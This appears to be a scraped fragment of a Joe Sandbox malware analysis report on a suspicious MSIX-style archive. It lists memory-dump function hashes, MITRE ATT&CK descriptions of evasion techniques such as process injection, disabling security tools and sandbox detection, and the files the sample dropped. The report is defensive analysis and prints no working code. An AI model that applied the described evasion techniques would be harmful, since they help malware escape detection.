Opcode Fuzzy Hash: 29e9e0f47e9e54fb6f8c48eef58826af43c532d0108964a2f3d06df85c92fed1
Instruction Fuzzy Hash: 91E09A32B102649FCB04EBB898502EEBFE5EBC9124B8045B9D108D7390EA34CC0A8380

Uniqueness

Uniqueness Score: -1.00%

Function 00DF0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447052682.0000000000DF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf26fc8afa37397360002aaab81ff700a5ae47ee0607949f981f5bf0be4b554d
Instruction ID: 3e80035d830b05d5b3889120480fa1130f25c4059cb9f48a6266e25f78fd475e
Opcode Fuzzy Hash: cf26fc8afa37397360002aaab81ff700a5ae47ee0607949f981f5bf0be4b554d
Instruction Fuzzy Hash: FEE092B66046045BD650CF0AFC41462F7D8EB84630B18C07FDC0D8BB01D275B508CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 04B10C60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1417644753b6b7a4d470a95ee5c66f396f7cde865196c800ce6e1e1809527a1e
Instruction ID: ad35f7e7981c5e04a22e7e20decf785470ef695a861c81c709e472a86a36b271
Opcode Fuzzy Hash: 1417644753b6b7a4d470a95ee5c66f396f7cde865196c800ce6e1e1809527a1e
Instruction Fuzzy Hash: C6D01232F002189B8B54EBF95C505DF7BEA9BC4154B5444799009D7740EF35DC458790

Uniqueness

Uniqueness Score: -1.00%

Function 04B10DD1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f780b81618f3a535fbf29dcb65c4188933e627acd4b91a4bf5df05bc8a075850
Instruction ID: 6a61226c3ebe0b474d4d3af0e76a0fc8e8c76fdd52a5b4772ff30d17c058ccb2
Opcode Fuzzy Hash: f780b81618f3a535fbf29dcb65c4188933e627acd4b91a4bf5df05bc8a075850
Instruction Fuzzy Hash: 5EE08C302482648FCB02A734D8A4ADA3FA1AFD2204F8985D9D048CFAB2D665D89DD780

Uniqueness

Uniqueness Score: -1.00%

Function 00C323F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446812620.0000000000C32000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c32000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e1cd038eba7fdf2f62e6f01d3ad6c2ec585bfb3273e78eef9afb6c33691a89
Instruction ID: 5469c4fe3a2442fb385cca17d434a8e77c7c44c292d18cac3f53dd79586706ff
Opcode Fuzzy Hash: 13e1cd038eba7fdf2f62e6f01d3ad6c2ec585bfb3273e78eef9afb6c33691a89
Instruction Fuzzy Hash: 90D05E792156C14FD7169A1CC1A4F9537D4AB51718F4A44F9A8008B763C768EA81E640

Uniqueness

Uniqueness Score: -1.00%

Function 00C323BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446812620.0000000000C32000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c32000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6467777e1b48b2033bf068ebadfe1b07b9cf430d048dd4ffa6c2a42111192e5a
Instruction ID: 40da6c0261be6529ddc1e39417aba1ab26fc0dbf4863f27e9ad567799ca3cf0c
Opcode Fuzzy Hash: 6467777e1b48b2033bf068ebadfe1b07b9cf430d048dd4ffa6c2a42111192e5a
Instruction Fuzzy Hash: E4D05E352402814FCB25DA0CD2D4F5977D8AF40B14F0644E8AC208B772C7A8D9C0CA00

Uniqueness

Uniqueness Score: -1.00%

Function 04B10DE0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563887a3ff3ced2fa498685aada86ea92da9b2abf0ed3f8cb4cc5ee388e029a1
Instruction ID: 039dad4575be4e55dd8d483cc61bed22a8da18f16b19e729b2f23c65a0383c94
Opcode Fuzzy Hash: 563887a3ff3ced2fa498685aada86ea92da9b2abf0ed3f8cb4cc5ee388e029a1
Instruction Fuzzy Hash: 5AC01230344308CBD708B768D859E2B779AABD0308F89C5A4A4080BBB9DA70FCC0D680

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report crm_5.2.14.0_x64__c4g82jgbfsn1c.zip

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AI_STUBS\AiStubX64.exe

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxBlockMap.xml

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxManifest.xml

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxMetadata\CodeIntegrity.cat

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxSignature.p7x

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\ManagerSquare150x150Logo.scale-100.png

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\ManagerSquare44x44Logo.scale-100.png

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\Store50x50Logo.scale-100.png

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\msix_default.png

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\License.txt

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll32.exe

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll64.exe

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime32.dll

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime64.dll

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Registry.dat

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\ShInstUtil.exe

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\StartingScriptWrapper.ps1

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Thunderbird%20Setup%20115.4.3.exe

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\VFS\AppData\iconv.dll

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_Common.xsl

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_DetailsFull_HTML.xsl

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_DetailsLight_HTML.xsl

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_PasswordsOnly_TXT.xsl

Windows Analysis Report
crm_5.2.14.0_x64__c4g82jgbfsn1c.zip